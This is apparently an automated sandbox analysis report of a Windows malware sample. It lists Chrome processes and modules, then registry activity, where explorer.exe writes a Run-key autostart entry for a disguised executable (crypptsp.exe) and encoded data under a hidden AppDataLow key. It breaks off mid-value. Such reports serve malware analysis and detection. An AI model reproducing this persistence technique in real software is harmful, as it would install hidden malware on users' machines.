c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\psapi.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3236
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=1016,4354039687547797337,9307865051739460964,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --disable-http2 --service-request-channel-token=17133106377135428070 --mojo-platform-channel-handle=3664 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
73.0.3683.75
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\psapi.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2132
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=1016,4354039687547797337,9307865051739460964,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --disable-http2 --service-request-channel-token=16040699506065840050 --mojo-platform-channel-handle=1900 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
73.0.3683.75
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\psapi.dll
c:\program files\google\chrome\application\73.0.3683.75\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

Registry activity

Total events
996
Read events
817
Write events
177
Delete events
2

Modification events

PID
Process
Operation
Key
Name
Value
252
explorer.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\OpenWithList
a
WinRAR.exe
252
explorer.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\OpenWithList
MRUList
a
252
explorer.exe
write
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\89726C36-545A-A301-A6CD-C8873A517CAB
Client
EA0300001C800000BCA451664B95D761A6CDC887DDC78EA900000000000000000000000000000000
252
explorer.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
bderplua
C:\Users\admin\AppData\Roaming\Microsoft\Devivmgr\crypptsp.exe
252
explorer.exe
write
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\89726C36-545A-A301-A6CD-C8873A517CAB
{1B42BE8A-BE10-0581-A07F-D209D423264D}
C2995A872FF3D401
252
explorer.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
EnableSPDY3_0
0
252
explorer.exe
write
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\89726C36-545A-A301-A6CD-C8873A517CAB
{48B27AF1-07B1-BABA-D1FC-2B8E95F08FA2}
C2011FE937F3D401
252
explorer.exe
write
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\89726C36-545A-A301-A6CD-C8873A517CAB
Client
EA0300003C800000BCA451664B95D761A6CDC887DDC78EA900000000000000000000000000000000
252
explorer.exe
write
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\89726C36-545A-A301-A6CD-C8873A517CAB
Client
EA0300003C810000BCA451664B95D761A6CDC887DDC78EA900000000000000000000000000000000
252
explorer.exe
write
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\89726C36-545A-A301-A6CD-C8873A517CAB
Client
EA0300003C810100BCA451664B95D761A6CDC887DDC78EA900000000000000000000000000000000
252
explorer.exe
write
HKEY_CURRENT_USER\Software\Microsoft\IAM
Server ID
2
252
explorer.exe
write
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\89726C36-545A-A301-A6CD-C8873A517CAB\Files
DAC709CCE23DEE4A0E
D44BFD74F60120013C4981764E0538059C45917DCE1758121C68D1514E7F58641CD4D1F04F8F59001E64D37C48EF5FC81644DBDC5F4F4AA82704EDDC184F01A8F20468DCB04E35A8420404DD30496DABA20FC4D25252
252
explorer.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\JvaENE\JvaENE.rkr
000000000000000000000000CA5E0000000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BFFFFFFFFF000000000000000000000000
252
explorer.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
0000000004000000020000008ED800000200000002000000724300004D006900630072006F0073006F00660074002E004100750074006F00470065006E006500720061007400650064002E007B00310035003900360032003100370035002D0037004400460043002D0042003100440037002D0042003000440031002D004500420034004300300038004600460044003700350034007D000000120200000000CC0B120200000000CC0B12020400050005001F02280C12020800050005001F026CE71F020100000154001F0200000100B8139D75444812020C0003000300000000000500280C12020000000005000000CC0B120201000000C8E91F02C0E91F0200000000C8FDDE02C0FCDE0244E71F023DA9457600000000FBFFFF7F68E71F02987880574F8C6244BB6371042380B1090000000001100211FFFFFFFF00000000000000000000000035EE190651EE190635EE1906000000000000000000000000080000002E006C006E006B0000005300630068006500640075006C00650072002E006C006E006B00000014000000140050000000070000000200060026030200A5863C750800000064021400E72F1B77B5863C753F030000CC04140000001400A86D150011000000B8451700B045170005000000F8F3DD0270E80000F28635BB20E81F028291457670E81F0224E81F022795457600000000ECD2DD024CE81F02CD944576ECD2DD02F8E81F0260CEDD02E19445760000000060CEDD02F8E81F0254E81F020200000002000000724300004D006900630072006F0073006F00660074002E004100750074006F00470065006E006500720061007400650064002E007B00310035003900360032003100370035002D0037004400460043002D0042003100440037002D0042003000440031002D004500420034004300300038004600460044003700350034007D000000120200000000CC0B120200000000CC0B12020400050005001F02280C12020800050005001F026CE71F020100000154001F0200000100B8139D75444812020C0003000300000000000500280C12020000000005000000CC0B120201000000C8E91F02C0E91F0200000000C8FDDE02C0FCDE0244E71F023DA9457600000000FBFFFF7F68E71F02987880574F8C6244BB6371042380B1090000000001100211FFFFFFFF00000000000000000000000035EE190651EE190635EE1906000000000000000000000000080000002E006C006E006B0000005300630068006500640075006C00650072002E006C006E006B00000014000000140050000000070000000200060026030200A5863C750800000064021400E72F1B77B5863C753F030000CC04140000001400A86D150011000000B8451700B045170005000000F8F3DD0270E80000F28635BB20E81F028291457670E81F0224E81F022795457600000000ECD2DD024CE81F02CD944576ECD2DD02F8E81F0260CEDD02E19445760000000060CEDD02F8E81F0254E81F020200000002000000724300004D006900630072006F0073006F00660074002E004100750074006F00470065006E006500720061007400650064002E007B00310035003900360032003100370035002D0037004400460043002D0042003100440037002D0042003000440031002D004500420034004300300038004600460044003700350034007D000000120200000000CC0B120200000000CC0B12020400050005001F02280C12020800050005001F026CE71F020100000154001F0200000100B8139D75444812020C0003000300000000000500280C12020000000005000000CC0B120201000000C8E91F02C0E91F0200000000C8FDDE02C0FCDE0244E71F023DA9457600000000FBFFFF7F68E71F02987880574F8C6244BB6371042380B1090000000001100211FFFFFFFF00000000000000000000000035EE190651EE190635EE1906000000000000000000000000080000002E006C006E006B0000005300630068006500640075006C00650072002E006C006E006B00000014000000140050000000070000000200060026030200A5863C750800000064021400E72F1B77B5863C753F030000CC04140000001400A86D150011000000B8451700B045170005000000F8F3DD0270E80000F28635BB20E81F028291457670E81F0224E81F022795457600000000ECD2DD024CE81F02CD944576ECD2DD02F8E81F0260CEDD02E19445760000000060CEDD02F8E81F0254E81F02
252
explorer.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Puebzr
00000000010000000000000000000000000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BFFFFFFFFF6055518C2FF3D40100000000
252
explorer.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
0000000005000000020000008ED800000200000002000000724300004D006900630072006F0073006F00660074002E004100750074006F00470065006E006500720061007400650064002E007B00310035003900360032003100370035002D0037004400460043002D0042003100440037002D0042003000440031002D004500420034004300300038004600460044003700350034007D000000120200000000CC0B120200000000CC0B12020400050005001F02280C12020800050005001F026CE71F020100000154001F0200000100B8139D75444812020C0003000300000000000500280C12020000000005000000CC0B120201000000C8E91F02C0E91F0200000000C8FDDE02C0FCDE0244E71F023DA9457600000000FBFFFF7F68E71F02987880574F8C6244BB6371042380B1090000000001100211FFFFFFFF00000000000000000000000035EE190651EE190635EE1906000000000000000000000000080000002E006C006E006B0000005300630068006500640075006C00650072002E006C006E006B00000014000000140050000000070000000200060026030200A5863C750800000064021400E72F1B77B5863C753F030000CC04140000001400A86D150011000000B8451700B045170005000000F8F3DD0270E80000F28635BB20E81F028291457670E81F0224E81F022795457600000000ECD2DD024CE81F02CD944576ECD2DD02F8E81F0260CEDD02E19445760000000060CEDD02F8E81F0254E81F020200000002000000724300004D006900630072006F0073006F00660074002E004100750074006F00470065006E006500720061007400650064002E007B00310035003900360032003100370035002D0037004400460043002D0042003100440037002D0042003000440031002D004500420034004300300038004600460044003700350034007D000000120200000000CC0B120200000000CC0B12020400050005001F02280C12020800050005001F026CE71F020100000154001F0200000100B8139D75444812020C0003000300000000000500280C12020000000005000000CC0B120201000000C8E91F02C0E91F0200000000C8FDDE02C0FCDE0244E71F023DA9457600000000FBFFFF7F68E71F02987880574F8C6244BB6371042380B1090000000001100211FFFFFFFF00000000000000000000000035EE190651EE190635EE1906000000000000000000000000080000002E006C006E006B0000005300630068006500640075006C00650072002E006C006E006B00000014000000140050000000070000000200060026030200A5863C750800000064021400E72F1B77B5863C753F030000CC04140000001400A86D150011000000B8451700B045170005000000F8F3DD0270E80000F28635BB20E81F028291457670E81F0224E81F022795457600000000ECD2DD024CE81F02CD944576ECD2DD02F8E81F0260CEDD02E19445760000000060CEDD02F8E81F0254E81F020200000002000000724300004D006900630072006F0073006F00660074002E004100750074006F00470065006E006500720061007400650064002E007B00310035003900360032003100370035002D0037004400460043002D0042003100440037002D0042003000440031002D004500420034004300300038004600460044003700350034007D000000120200000000CC0B120200000000CC0B12020400050005001F02280C12020800050005001F026CE71F020100000154001F0200000100B8139D75444812020C0003000300000000000500280C12020000000005000000CC0B120201000000C8E91F02C0E91F0200000000C8FDDE02C0FCDE0244E71F023DA9457600000000FBFFFF7F68E71F02987880574F8C6244BB6371042380B1090000000001100211FFFFFFFF00000000000000000000000035EE190651EE190635EE1906000000000000000000000000080000002E006C006E006B0000005300630068006500640075006C00650072002E006C006E006B00000014000000140050000000070000000200060026030200A5863C750800000064021400E72F1B77B5863C753F030000CC04140000001400A86D150011000000B8451700B045170005000000F8F3DD0270E80000F28635BB20E81F028291457670E81F0224E81F022795457600000000ECD2DD024CE81F02CD944576ECD2DD02F8E81F0260CEDD02E19445760000000060CEDD02F8E81F0254E81F02
252
explorer.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count
P:\Hfref\Choyvp\Qrfxgbc\Tbbtyr Puebzr.yax
00000000010000000000000000000000000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BFFFFFFFFF6055518C2FF3D40100000000
252
explorer.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count
HRZR_PGYFRFFVBA
000000000400000000000000030000000200000000000000020000007B00300031003300390044003400340045002D0036004100460045002D0034003900460032002D0038003600390030002D003300440041004600430041004500360046004600420038007D005C004100630063006500730073006F0072006900650073005C00530079007300740065006D00200054006F006F006C0073005C005400610073006B0020005300630068006500640075006C00650072002E006C006E006B0000006C006E006B0000008006EDE0177749713800FEFFFFFFE72F1B77822E1B77B8F944763302000086000000B5B9A3710000000008E1F00520661400F8671400D891FE05987D1400AC3600378CD6800648DE800654F98006EDE01777497138000000000030D78006399C26762062D802800200008000000031000000A064D8022062D80254D78006DE9C26762062D80200000000B102000008000000B90200005CD78006330200001862D80284D78006431945764B64D802489F1D00860000001862D8022094FE0533020000B8F94476541E0000C8B0D102A0D7800633AB1B77C880C7C6000C00001027000012000000AC540200D4D78006F8AA1B77AC540200C8B0D102F4D78006B0B7DE0274D8800600000000A301000034D8000036B9AABFE4D780068291457634D88006E8D7800627954576000000003CBCDE0210D88006CD9445763CBCDE02BCD88006B0B7DE02E194457600000000B0B7DE02BCD8800618D880060200000000000000020000007B00300031003300390044003400340045002D0036004100460045002D0034003900460032002D0038003600390030002D003300440041004600430041004500360046004600420038007D005C004100630063006500730073006F0072006900650073005C00530079007300740065006D00200054006F006F006C0073005C005400610073006B0020005300630068006500640075006C00650072002E006C006E006B0000006C006E006B0000008006EDE0177749713800FEFFFFFFE72F1B77822E1B77B8F944763302000086000000B5B9A3710000000008E1F00520661400F8671400D891FE05987D1400AC3600378CD6800648DE800654F98006EDE01777497138000000000030D78006399C26762062D802800200008000000031000000A064D8022062D80254D78006DE9C26762062D80200000000B102000008000000B90200005CD78006330200001862D80284D78006431945764B64D802489F1D00860000001862D8022094FE0533020000B8F94476541E0000C8B0D102A0D7800633AB1B77C880C7C6000C00001027000012000000AC540200D4D78006F8AA1B77AC540200C8B0D102F4D78006B0B7DE0274D8800600000000A301000034D8000036B9AABFE4D780068291457634D88006E8D7800627954576000000003CBCDE0210D88006CD9445763CBCDE02BCD88006B0B7DE02E194457600000000B0B7DE02BCD8800618D880060200000000000000020000007B00300031003300390044003400340045002D0036004100460045002D0034003900460032002D0038003600390030002D003300440041004600430041004500360046004600420038007D005C004100630063006500730073006F0072006900650073005C00530079007300740065006D00200054006F006F006C0073005C005400610073006B0020005300630068006500640075006C00650072002E006C006E006B0000006C006E006B0000008006EDE0177749713800FEFFFFFFE72F1B77822E1B77B8F944763302000086000000B5B9A3710000000008E1F00520661400F8671400D891FE05987D1400AC3600378CD6800648DE800654F98006EDE01777497138000000000030D78006399C26762062D802800200008000000031000000A064D8022062D80254D78006DE9C26762062D80200000000B102000008000000B90200005CD78006330200001862D80284D78006431945764B64D802489F1D00860000001862D8022094FE0533020000B8F94476541E0000C8B0D102A0D7800633AB1B77C880C7C6000C00001027000012000000AC540200D4D78006F8AA1B77AC540200C8B0D102F4D78006B0B7DE0274D8800600000000A301000034D8000036B9AABFE4D780068291457634D88006E8D7800627954576000000003CBCDE0210D88006CD9445763CBCDE02BCD88006B0B7DE02E194457600000000B0B7DE02BCD8800618D88006
252
explorer.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count
P:\Hfref\Choyvp\Qrfxgbc\Tbbtyr Puebzr.yax
00000000010000000000000001000000000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BFFFFFFFFF6055518C2FF3D40100000000
252
explorer.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count
HRZR_PGYFRFFVBA
000000000400000000000000040000000200000000000000020000007B00300031003300390044003400340045002D0036004100460045002D0034003900460032002D0038003600390030002D003300440041004600430041004500360046004600420038007D005C004100630063006500730073006F0072006900650073005C00530079007300740065006D00200054006F006F006C0073005C005400610073006B0020005300630068006500640075006C00650072002E006C006E006B0000006C006E006B0000008006EDE0177749713800FEFFFFFFE72F1B77822E1B77B8F944763302000086000000B5B9A3710000000008E1F00520661400F8671400D891FE05987D1400AC3600378CD6800648DE800654F98006EDE01777497138000000000030D78006399C26762062D802800200008000000031000000A064D8022062D80254D78006DE9C26762062D80200000000B102000008000000B90200005CD78006330200001862D80284D78006431945764B64D802489F1D00860000001862D8022094FE0533020000B8F94476541E0000C8B0D102A0D7800633AB1B77C880C7C6000C00001027000012000000AC540200D4D78006F8AA1B77AC540200C8B0D102F4D78006B0B7DE0274D8800600000000A301000034D8000036B9AABFE4D780068291457634D88006E8D7800627954576000000003CBCDE0210D88006CD9445763CBCDE02BCD88006B0B7DE02E194457600000000B0B7DE02BCD8800618D880060200000000000000020000007B00300031003300390044003400340045002D0036004100460045002D0034003900460032002D0038003600390030002D003300440041004600430041004500360046004600420038007D005C004100630063006500730073006F0072006900650073005C00530079007300740065006D00200054006F006F006C0073005C005400610073006B0020005300630068006500640075006C00650072002E006C006E006B0000006C006E006B0000008006EDE0177749713800FEFFFFFFE72F1B77822E1B77B8F944763302000086000000B5B9A3710000000008E1F00520661400F8671400D891FE05987D1400AC3600378CD6800648DE800654F98006EDE01777497138000000000030D78006399C26762062D802800200008000000031000000A064D8022062D80254D78006DE9C26762062D80200000000B102000008000000B90200005CD78006330200001862D80284D78006431945764B64D802489F1D00860000001862D8022094FE0533020000B8F94476541E0000C8B0D102A0D7800633AB1B77C880C7C6000C00001027000012000000AC540200D4D78006F8AA1B77AC540200C8B0D102F4D78006B0B7DE0274D8800600000000A301000034D8000036B9AABFE4D780068291457634D88006E8D7800627954576000000003CBCDE0210D88006CD9445763CBCDE02BCD88006B0B7DE02E194457600000000B0B7DE02BCD8800618D880060200000000000000020000007B00300031003300390044003400340045002D0036004100460045002D0034003900460032002D0038003600390030002D003300440041004600430041004500360046004600420038007D005C004100630063006500730073006F0072006900650073005C00530079007300740065006D00200054006F006F006C0073005C005400610073006B0020005300630068006500640075006C00650072002E006C006E006B0000006C006E006B0000008006EDE0177749713800FEFFFFFFE72F1B77822E1B77B8F944763302000086000000B5B9A3710000000008E1F00520661400F8671400D891FE05987D1400AC3600378CD6800648DE800654F98006EDE01777497138000000000030D78006399C26762062D802800200008000000031000000A064D8022062D80254D78006DE9C26762062D80200000000B102000008000000B90200005CD78006330200001862D80284D78006431945764B64D802489F1D00860000001862D8022094FE0533020000B8F94476541E0000C8B0D102A0D7800633AB1B77C880C7C6000C00001027000012000000AC540200D4D78006F8AA1B77AC540200C8B0D102F4D78006B0B7DE0274D8800600000000A301000034D8000036B9AABFE4D780068291457634D88006E8D7800627954576000000003CBCDE0210D88006CD9445763CBCDE02BCD88006B0B7DE02E194457600000000B0B7DE02BCD8800618D88006
252
explorer.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
252
explorer.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Puebzr
0000000001000000000000001A350000000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BFFFFFFFFF6055518C2FF3D40100000000
252
explorer.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
000000000500000002000000A80D01000200000002000000724300004D006900630072006F0073006F00660074002E004100750074006F00470065006E006500720061007400650064002E007B00310035003900360032003100370035002D0037004400460043002D0042003100440037002D0042003000440031002D004500420034004300300038004600460044003700350034007D000000120200000000CC0B120200000000CC0B12020400050005001F02280C12020800050005001F026CE71F020100000154001F0200000100B8139D75444812020C0003000300000000000500280C12020000000005000000CC0B120201000000C8E91F02C0E91F0200000000C8FDDE02C0FCDE0244E71F023DA9457600000000FBFFFF7F68E71F02987880574F8C6244BB6371042380B1090000000001100211FFFFFFFF00000000000000000000000035EE190651EE190635EE1906000000000000000000000000080000002E006C006E006B0000005300630068006500640075006C00650072002E006C006E006B00000014000000140050000000070000000200060026030200A5863C750800000064021400E72F1B77B5863C753F030000CC04140000001400A86D150011000000B8451700B045170005000000F8F3DD0270E80000F28635BB20E81F028291457670E81F0224E81F022795457600000000ECD2DD024CE81F02CD944576ECD2DD02F8E81F0260CEDD02E19445760000000060CEDD02F8E81F0254E81F020200000002000000724300004D006900630072006F0073006F00660074002E004100750074006F00470065006E006500720061007400650064002E007B00310035003900360032003100370035002D0037004400460043002D0042003100440037002D0042003000440031002D004500420034004300300038004600460044003700350034007D000000120200000000CC0B120200000000CC0B12020400050005001F02280C12020800050005001F026CE71F020100000154001F0200000100B8139D75444812020C0003000300000000000500280C12020000000005000000CC0B120201000000C8E91F02C0E91F0200000000C8FDDE02C0FCDE0244E71F023DA9457600000000FBFFFF7F68E71F02987880574F8C6244BB6371042380B1090000000001100211FFFFFFFF00000000000000000000000035EE190651EE190635EE1906000000000000000000000000080000002E006C006E006B0000005300630068006500640075006C00650072002E006C006E006B00000014000000140050000000070000000200060026030200A5863C750800000064021400E72F1B77B5863C753F030000CC04140000001400A86D150011000000B8451700B045170005000000F8F3DD0270E80000F28635BB20E81F028291457670E81F0224E81F022795457600000000ECD2DD024CE81F02CD944576ECD2DD02F8E81F0260CEDD02E19445760000000060CEDD02F8E81F0254E81F020200000002000000724300004D006900630072006F0073006F00660074002E004100750074006F00470065006E006500720061007400650064002E007B00310035003900360032003100370035002D0037004400460043002D0042003100440037002D0042003000440031002D004500420034004300300038004600460044003700350034007D000000120200000000CC0B120200000000CC0B12020400050005001F02280C12020800050005001F026CE71F020100000154001F0200000100B8139D75444812020C0003000300000000000500280C12020000000005000000CC0B120201000000C8E91F02C0E91F0200000000C8FDDE02C0FCDE0244E71F023DA9457600000000FBFFFF7F68E71F02987880574F8C6244BB6371042380B1090000000001100211FFFFFFFF00000000000000000000000035EE190651EE190635EE1906000000000000000000000000080000002E006C006E006B0000005300630068006500640075006C00650072002E006C006E006B00000014000000140050000000070000000200060026030200A5863C750800000064021400E72F1B77B5863C753F030000CC04140000001400A86D150011000000B8451700B045170005000000F8F3DD0270E80000F28635BB20E81F028291457670E81F0224E81F022795457600000000ECD2DD024CE81F02CD944576ECD2DD02F8E81F0260CEDD02E19445760000000060CEDD02F8E81F0254E81F02
252
explorer.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\JvaENE\JvaENE.rkr
000000000000000001000000CA5E0000000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BFFFFFFFFF000000000000000000000000
252
explorer.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
000000000500000003000000A80D01000200000002000000724300004D006900630072006F0073006F00660074002E004100750074006F00470065006E006500720061007400650064002E007B00310035003900360032003100370035002D0037004400460043002D0042003100440037002D0042003000440031002D004500420034004300300038004600460044003700350034007D000000120200000000CC0B120200000000CC0B12020400050005001F02280C12020800050005001F026CE71F020100000154001F0200000100B8139D75444812020C0003000300000000000500280C12020000000005000000CC0B120201000000C8E91F02C0E91F0200000000C8FDDE02C0FCDE0244E71F023DA9457600000000FBFFFF7F68E71F02987880574F8C6244BB6371042380B1090000000001100211FFFFFFFF00000000000000000000000035EE190651EE190635EE1906000000000000000000000000080000002E006C006E006B0000005300630068006500640075006C00650072002E006C006E006B00000014000000140050000000070000000200060026030200A5863C750800000064021400E72F1B77B5863C753F030000CC04140000001400A86D150011000000B8451700B045170005000000F8F3DD0270E80000F28635BB20E81F028291457670E81F0224E81F022795457600000000ECD2DD024CE81F02CD944576ECD2DD02F8E81F0260CEDD02E19445760000000060CEDD02F8E81F0254E81F020200000002000000724300004D006900630072006F0073006F00660074002E004100750074006F00470065006E006500720061007400650064002E007B00310035003900360032003100370035002D0037004400460043002D0042003100440037002D0042003000440031002D004500420034004300300038004600460044003700350034007D000000120200000000CC0B120200000000CC0B12020400050005001F02280C12020800050005001F026CE71F020100000154001F0200000100B8139D75444812020C0003000300000000000500280C12020000000005000000CC0B120201000000C8E91F02C0E91F0200000000C8FDDE02C0FCDE0244E71F023DA9457600000000FBFFFF7F68E71F02987880574F8C6244BB6371042380B1090000000001100211FFFFFFFF00000000000000000000000035EE190651EE190635EE1906000000000000000000000000080000002E006C006E006B0000005300630068006500640075006C00650072002E006C006E006B00000014000000140050000000070000000200060026030200A5863C750800000064021400E72F1B77B5863C753F030000CC04140000001400A86D150011000000B8451700B045170005000000F8F3DD0270E80000F28635BB20E81F028291457670E81F0224E81F022795457600000000ECD2DD024CE81F02CD944576ECD2DD02F8E81F0260CEDD02E